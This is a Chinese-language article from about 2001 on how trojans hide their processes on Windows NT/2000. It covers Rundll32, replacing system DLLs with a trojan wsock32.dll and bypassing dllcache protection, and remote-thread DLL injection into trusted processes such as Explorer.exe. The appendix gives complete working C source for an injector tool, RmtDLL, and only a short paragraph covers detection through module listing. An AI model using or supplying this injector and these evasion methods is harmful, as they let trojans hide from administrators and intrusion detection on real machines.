在WIN9X中,只需要將進程注冊為系統服務就能夠從進程查看器中隱形,可是這一切在WINNT中卻完全不同,無論木馬從端口、啟動文件上如何巧妙地隱藏自己,始終都不能欺騙WINNT的任務管理器,以至於很多的朋友問我:在WINNT下難道木馬真的再也無法隱藏自己的進程了?本文試圖通過探討WINNT中木馬的幾種常用隱藏進程手段,給大家揭示木馬/後門程序在WINNT中進程隱藏的方法和查找的途徑。
我們知道,在WINDOWS系統下,可執行文件主要是Exe和Com文件,這兩種文件在運行時都有一個共同點,會生成一個獨立的進程,查找特定進程是我們發現木馬的主要方法之一(無論手動還是防火牆),隨著入侵檢測軟件的不斷發展,關聯進程和SOCKET已經成為流行的技術(例如著名的FPort就能夠檢測出任何進程打開的TCP/UDP端口),假設一個木馬在運行時被檢測軟件同時查出端口和進程,我們基本上認為這個木馬的隱藏已經完全失敗(利用心理因素而非技術手段欺騙用戶的木馬不在我們的討論范圍之內)。在NT下正常情況用戶進程對於系統管理員來說都是可見的,要想做到木馬的進程隱藏,有兩個辦法,第一是讓系統管理員看不見(或者視而不見)你的進程;第二是不使用進程。
看不見進程的方法就是進行進程欺騙,為了了解如何能使進程看不見,我們首先要了解怎樣能看得見進程:在Windows中有多種方法能夠看到進程的存在:PSAPI(Process Status API),PDH(Performance Data Helper),ToolHelp API,如果我們能夠欺騙用戶或入侵檢測軟件用來查看進程的函數(例如截獲相應的API調用,替換返回的數據),我們就完全能實現進程隱藏,但是一來我們並不知道用戶/入侵檢測軟件使用的是什麼方法來查看進程列表,二來如果我們有權限和技術實現這樣的欺騙,我們就一定能使用其它的方法更容易的實現進程的隱藏。
第二種方法是不使用進程,不使用進程使用什麼?為了弄明白這個問題,我們必須要先了解Windows系統的另一種“可執行文件”----DLL,DLL是Dynamic Link Library(動態鏈接庫)的縮寫,DLL文件是Windows的基礎,因為所有的API函數都是在DLL中實現的。DLL文件沒有程序邏輯,是由多個功能函數構成,它並不能獨立運行,一般都是由進程加載並調用的。(你你你,你剛剛不是說不用進程了?)別急呀,聽我慢慢道來:因為DLL文件不能獨立運行,所以在進程列表中並不會出現DLL,假設我們編寫了一個木馬DLL,並且通過別的進程來運行它,那麼無論是入侵檢測軟件還是進程列表中,都只會出現那個進程而並不會出現木馬DLL,如果那個進程是可信進程,(例如資源管理器Explorer.exe,沒人會懷疑它是木馬吧?)那麼我們編寫的DLL作為那個進程的一部分,也將成為被信賴的一員而為所欲為。
運行DLL文件最簡單的方法是利用Rundll32.exe,Rundll/Rundll32是Windows自帶的動態鏈接庫工具,可以用來在命令行下執行動態鏈接庫中的某個函數,其中Rundll是16位而Rundll32是32位的(分別調用16位和32位的DLL文件),Rundll32的使用方法如下:
Rundll32.exe DllFileName FuncName
例如我們編寫了一個MyDll.dll,這個動態鏈接庫中定義了一個MyFunc的函數,那麼,我們通過Rundll32.exe MyDll.dll MyFunc就可以執行MyFunc函數的功能。
如何運行DLL文件和木馬進程的隱藏有什麼關系麼?當然有了,假設我們在MyFunc函數中實現了木馬的功能,那麼我們不就可以通過Rundll32來運行這個木馬了麼?在系統管理員看來,進程列表中增加的是Rundll32.exe而並不是木馬文件,這樣也算是木馬的一種簡易欺騙和自我保護方法(至少你不能去把Rundll32.exe刪掉吧?)
使用Rundll32的方法進行進程隱藏是簡易的,非常容易被識破。(雖然殺起來會麻煩一點)比較高級的方法是使用特洛伊DLL,特洛伊DLL的工作原理是替換常用的DLL文件,將正常的調用轉發給原DLL,截獲並處理特定的消息。例如,我們知道WINDOWS的Socket 1.x的函數都是存放在wsock32.dll中的,那麼我們自己寫一個wsock32.dll文件,替換掉原先的wsock32.dll(將原先的DLL文件重命名為wsockold.dll)我們的wsock32.dll只做兩件事,一是如果遇到不認識的調用,就直接轉發給wsockold.dll(使用函數轉發器forward);二是遇到特殊的請求(事先約定的)就解碼並處理。這樣理論上只要木馬編寫者通過SOCKET遠程輸入一定的暗號,就可以控制wsock32.dll(木馬DLL)做任何操作。特洛伊DLL技術是比較古老的技術,因此微軟也對此做了相當的防范,在Win2K的system32目錄下有一個dllcache的目錄,這個目錄中存放著大量的DLL文件(也包括一些重要的exe文件),這個是微軟用來保護DLL的法寶,一旦操作系統發現被保護的DLL文件被篡改(數字簽名技術),它就會自動從dllcache中恢復這個文件。雖然說先更改dllcache目錄中的備份再修改DLL文件本身可以繞過這個保護,但是可以想見的是微軟在未來必將更加小心地保護重要的DLL文件,同時特洛伊DLL方法本身有著一些漏洞(例如修復安裝、安裝補丁、檢查數字簽名等方法都有可能導致特洛伊DLL失效),所以這個方法也不能算是DLL木馬的最優選擇。
DLL木馬的最高境界是動態嵌入技術,動態嵌入技術指的是將自己的代碼嵌入正在運行的進程中的技術。理論上來說,在Windows中的每個進程都有自己的私有內存空間,別的進程是不允許對這個私有空間進行操作的(私人領地、請勿入內),但是實際上,我們仍然可以利用種種方法進入並操作進程的私有內存。在多種動態嵌入技術中(窗口Hook、掛接API、遠程線程),我最喜歡的是遠程線程技術(其實、其實我就會這一種……),下面就為大家介紹一下遠程線程技術。
遠程線程技術指的是通過在另一個運行的進程中創建遠程線程的方法進入那個線程的內存地址空間。我們知道,在進程中,可以通過CreateThread函數創建線程,被創建的新線程與主線程(就是進程創建時被同時自動建立的那個線程)共享地址空間以及其他的資源。但是很少有人知道,通過CreateRemoteThread也同樣可以在另一個進程內創建新線程,被創建的遠程線程同樣可以共享遠程進程(注意:是遠程進程!)的地址空間,所以,實際上,我們通過創建一個遠程線程,進入了遠程進程的內存地址空間,也就擁有了那個遠程進程相當多的權限:例如啟動一個DLL木馬(與進入進程內部相比,啟動一個DLL木馬是小意思,實際上我們可以隨意篡改那個進程的數據)
閒話少說,我們來看代碼:
首先,我們通過OpenProcess 來打開我們試圖嵌入的進程(如果不允許打開,那麼嵌入就無法進行了,這往往是由於權限不夠引起的,例如你試圖打開一個受系統保護的進程)
hRemoteProcess = OpenProcess( PROCESS_CREATE_THREAD | //允許遠程創建線程
PROCESS_VM_OPERATION | //允許遠程VM操作
PROCESS_VM_WRITE, //允許遠程VM寫
FALSE, dwRemoteProcessId );
由於我們後面需要寫入遠程進程的內存地址空間並建立遠程線程,所以需要申請足夠的權限(PROCESS_CREATE_THREAD、VM_OPERATION、VM_WRITE)。
然後,我們可以建立LoadLibraryW這個線程來啟動我們的DLL木馬,LoadLibraryW函數是在kernel32.dll中定義的,用來加載DLL文件,它只有一個參數,就是DLL文件的絕對路徑名pszLibFileName,(也就是木馬DLL的全路徑文件名),但是由於木馬DLL是在遠程進程內調用的,所以我們首先還需要將這個文件名復制到遠程地址空間:(否則遠程線程讀不到這個參數)
//計算DLL路徑名需要的內存空間
int cb = (1 + lstrlenW(pszLibFileName)) * sizeof(WCHAR);
//使用VirtualAllocEx函數在遠程進程的內存地址空間分配DLL文件名緩沖區
pszLibFileRemote = (PWSTR) VirtualAllocEx( hRemoteProcess, NULL, cb,
MEM_COMMIT, PAGE_READWRITE);
//使用WriteProcessMemory函數將DLL的路徑名復制到遠程進程的內存空間
iReturnCode = WriteProcessMemory(hRemoteProcess,
pszLibFileRemote, (PVOID) pszLibFileName, cb, NULL);
//計算LoadLibraryW的入口地址
PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)
GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");
說明一下,上面我們計算的其實是自己這個進程內LoadLibraryW的入口地址,但是因為kernel.dll模塊在所有進程內的地址都是相同的(屬於內核模塊),所以這個入口地址同樣適用於遠程進程。
OK,萬事俱備,我們通過建立遠程線程時的地址pfnStartAddr(實際上就是LoadLibraryW的入口地址)和傳遞的參數pszLibFileRemote(我們復制到遠程進程內存空間的木馬DLL的全路徑文件名)在遠程進程內啟動我們的木馬DLL:
//啟動遠程線程LoadLibraryW,通過遠程線程調用用戶的DLL文件
hRemoteThread = CreateRemoteThread(hRemoteProcess, //被嵌入的遠程進程
NULL, 0,
pfnStartAddr, //LoadLibraryW的入口地址
pszLibFileRemote, //木馬DLL的全路徑文件名
0, NULL);
至此,遠程嵌入順利完成,為了試驗我們的DLL是不是已經正常的在遠程線程運行,我編寫了以下的測試DLL,這個DLL什麼都不做,僅僅返回所在進程的PID:
BOOL APIENTRY DllMain(HANDLE hModule, DWORD reason, LPVOID lpReserved)
{ char * szProcessId = (char *)malloc(10*sizeof(char));
switch (reason){
case DLL_PROCESS_ATTACH:{
//獲取並顯示當前進程ID
_itoa(GetCurrentProcessId(), szProcessId, 10);
MessageBox(NULL,szProcessId,"RemoteDLL",MB_OK);
}
default:
return TRUE;
}
}
當我使用RmtDll.exe程序將這個TestDLL.dll嵌入Explorer.exe進程後(PID=1208),該測試DLL彈出了1208字樣的確認框,證明TestDLL.dll已經在Explorer.exe進程內正確地運行了。(木馬已經成為Explorer.exe的一部分)
DLL木馬的查找:查找DLL木馬的基本思路是擴展進程列表至內存模塊列表,內存模塊列表將顯示每個進程目前加載/調用的所有DLL文件,通過這種方法,我們能發現異常的DLL文件(前提是你對所有進程需要調用的模塊都很熟悉,天哪,這幾乎是沒有可能的事,要知道隨便哪個進程都會調用十七八個DLL文件,而Windows更是由數以千計的DLL所組成的,誰能知道哪個有用哪個沒用?)對此,我寫了一個內存模塊查看軟件,在http://www.patching.net/shotgun/ps.zip可以下載,該軟件使用PSAPI,如果是NT4.0,需要PSAPI.dll的支持,所以我把PSAPI.dll也放在了壓縮包裡。
進一步想想,用遠程線程技術啟動木馬DLL還是比較有跡可尋的,如果事先將一段代碼復制進遠程進程的內存空間,然後通過遠程線程起動這段代碼,那麼,即使遍歷進程內存模塊也無濟於事;或者遠程線程切入某個原本就需要進行SOCKET操作的進程(如iExplorer.exe),對函數調用或數據進行某些有針對的修改……這樣的木馬並不需要自己打開端口,代碼也只是存在於內存中,可以說如羚羊掛角,無跡可尋。
無論是使用特洛伊DLL還是使用遠程線程,都是讓木馬的核心代碼運行於別的進程的內存空間,這樣不僅能很好地隱藏自己,也能更好的保護自己。
這個時候,我們可以說已經實現了一個真正意義上的木馬,它不僅欺騙、進入你的計算機,甚至進入了用戶進程的內部,從某種意義上說,這種木馬已經具備了病毒的很多特性,例如隱藏和寄生(和宿主同生共死),如果有一天,出現了具備所有病毒特性的木馬(不是指蠕蟲,而是傳統意義上的寄生病毒),我想我並不會感到奇怪,倒會疑問這一天為什麼這麼遲才到來。
附錄:利用遠程線程技術嵌入進程的模型源碼:
/////////////////////////////////////////////////////////////////////////////////////////////// //
// Remote DLL For Win2K by Shotgun //
// This Program can inject a DLL into Remote Process //
// //
// Released: [2001.4] //
// Author: [Shotgun] //
// Email: [[email protected]] //
// Homepage: //
// [http://IT.Xici.Net] //
// [http://WWW.Patching.Net] //
// //
// USAGE: //
// RmtDLL.exe PID[|ProcessName] DLLFullPathName //
// Example: //
// RmtDLL.exe 1024 C:\WINNT\System32\MyDLL.dll //
// RmtDLL.exe Explorer.exe C:\MyDLL.dll //
// //
///////////////////////////////////////////////////////////////////////////////////////////////
#include<windows.h>
#include<stdlib.h>
#include<stdio.h>
#include<psapi.h>
DWORD ProcessToPID( char *); //將進程名轉換為PID的函數
void CheckError ( int, int, char *); //出錯處理函數
void usage ( char *); //使用說明函數
PDWORD pdwThreadId;
HANDLE hRemoteThread, hRemoteProcess;
DWORD fdwCreate, dwStackSize, dwRemoteProcessId;
PWSTR pszLibFileRemote=NULL;
void main(int argc,char **argv)
{
int iReturnCode;
char lpDllFullPathName[MAX_PATH];
WCHAR pszLibFileName[MAX_PATH]={0};
//處理命令行參數
if (argc!=3) usage("Parametes number incorrect!");
else{
//如果輸入的是進程名,則轉化為PID
if(isdigit(*argv[1])) dwRemoteProcessId = atoi(argv[1]);
else dwRemoteProcessId = ProcessToPID(argv[1]);
//判斷輸入的DLL文件名是否是絕對路徑
if(strstr(argv[2],":\\")!=NULL)
strncpy(argv[2], lpDllFullPathName, MAX_PATH);
else
{ //取得當前目錄,將相對路徑轉換成絕對路徑
iReturnCode = GetCurrentDirectory(MAX_PATH, lpDllFullPathName);
CheckError(iReturnCode, 0, "GetCurrentDirectory");
strcat(lpDllFullPathName, "\\");
strcat(lpDllFullPathName, argv[2]);
printf("Convert DLL filename to FullPathName:\n\t%s\n\n",
lpDllFullPathName);
}
//判斷DLL文件是否存在
iReturnCode=(int)_lopen(lpDllFullPathName, OF_READ);
CheckError(iReturnCode, HFILE_ERROR, "DLL File not Exist");
//將DLL文件全路徑的ANSI碼轉換成UNICODE碼
iReturnCode = MultiByteToWideChar(CP_ACP, MB_ERR_INVALID_CHARS,
lpDllFullPathName, strlen(lpDllFullPathName),
pszLibFileName, MAX_PATH);
CheckError(iReturnCode, 0, "MultByteToWideChar");
//輸出最後的操作參數
wprintf(L"Will inject %s", pszLibFileName);
printf(" into process:%s PID=%d\n", argv[1], dwRemoteProcessId);
}
//打開遠程進程
hRemoteProcess = OpenProcess(PROCESS_CREATE_THREAD | //允許創建線程
PROCESS_VM_OPERATION | //允許VM操作
PROCESS_VM_WRITE, //允許VM寫
FALSE, dwRemoteProcessId );
CheckError( (int) hRemoteProcess, NULL,
"Remote Process not Exist or Access Denied!");
//計算DLL路徑名需要的內存空間
int cb = (1 + lstrlenW(pszLibFileName)) * sizeof(WCHAR);
pszLibFileRemote = (PWSTR) VirtualAllocEx( hRemoteProcess, NULL, cb,
MEM_COMMIT, PAGE_READWRITE);
CheckError((int)pszLibFileRemote, NULL, "VirtualAllocEx");
//將DLL的路徑名復制到遠程進程的內存空間
iReturnCode = WriteProcessMemory(hRemoteProcess,
pszLibFileRemote, (PVOID) pszLibFileName, cb, NULL);
CheckError(iReturnCode, false, "WriteProcessMemory");
//計算LoadLibraryW的入口地址
PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)
GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");
CheckError((int)pfnStartAddr, NULL, "GetProcAddress");
//啟動遠程線程,通過遠程線程調用用戶的DLL文件
hRemoteThread = CreateRemoteThread( hRemoteProcess, NULL, 0, pfnStartAddr, pszLibFileRemote, 0, NULL);
CheckError((int)hRemoteThread, NULL, "Create Remote Thread");
//等待遠程線程退出
WaitForSingleObject(hRemoteThread, INFINITE);
//清場處理
if (pszLibFileRemote != NULL)
VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE);
if (hRemoteThread != NULL) CloseHandle(hRemoteThread );
if (hRemoteProcess!= NULL) CloseHandle(hRemoteProcess);
}//end of main()
//將進程名轉換為PID的函數
DWORD ProcessToPID(char *InputProcessName)
{
DWORD aProcesses[1024], cbNeeded, cProcesses;
unsigned int i;
HANDLE hProcess;
HMODULE hMod;
char szProcessName[MAX_PATH] = "UnknownProcess";
// 計算目前有多少進程, aProcesses[]用來存放有效的進程PIDs
if ( !EnumProcesses( aProcesses, sizeof(aProcesses), &cbNeeded ) ) return 0;
cProcesses = cbNeeded / sizeof(DWORD);
// 按有效的PID遍歷所有的進程
for ( i = 0; i < cProcesses; i++ )
{
// 打開特定PID的進程
hProcess = OpenProcess( PROCESS_QUERY_INFORMATION |
PROCESS_VM_READ,
FALSE, aProcesses[i]);
// 取得特定PID的進程名
if ( hProcess )
{
if ( EnumProcessModules( hProcess, &hMod, sizeof(hMod), &cbNeeded) )
{
GetModuleBaseName( hProcess, hMod,
szProcessName, sizeof(szProcessName) );
//將取得的進程名與輸入的進程名比較,如相同則返回進程PID
if(!_stricmp(szProcessName, InputProcessName)){
CloseHandle( hProcess );
return aProcesses[i];
}
}
}//end of if ( hProcess )
}//end of for
//沒有找到相應的進程名,返回0
CloseHandle( hProcess );
return 0;
}//end of ProcessToPID
//錯誤處理函數CheckError()
//如果iReturnCode等於iErrorCode,則輸出pErrorMsg並退出
void CheckError(int iReturnCode, int iErrorCode, char *pErrorMsg)
{
if(iReturnCode==iErrorCode) {
printf("%s Error:%d\n\n", pErrorMsg, GetLastError());
//清場處理
if (pszLibFileRemote != NULL)
VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE);
if (hRemoteThread != NULL) CloseHandle(hRemoteThread );
if (hRemoteProcess!= NULL) CloseHandle(hRemoteProcess);
exit(0);
}
}//end of CheckError()
//使用方法說明函數usage()
void usage(char * pErrorMsg)
{
printf("%s\n\n",pErrorMsg);
printf("\t\tRemote Process DLL by Shotgun\n");
printf("\tThis program can inject a DLL into remote process\n");
printf("Email:\n");
printf("\[email protected]\n");
printf("HomePage:\n");
printf("\thttp://It.Xici.Net\n");
printf("\thttp://www.Patching.Net\n");
printf("USAGE:\n");
printf("\tRmtDLL.exe PID[|ProcessName] DLLFullPathName\n");
printf("Example:\n");
printf("\tRmtDLL.exe 1024 C:\\WINNT\\System32\\MyDLL.dll\n");
printf("\tRmtDLL.exe Explorer.exe C:\\MyDLL.dll\n");
exit(0);
}//end of usage()
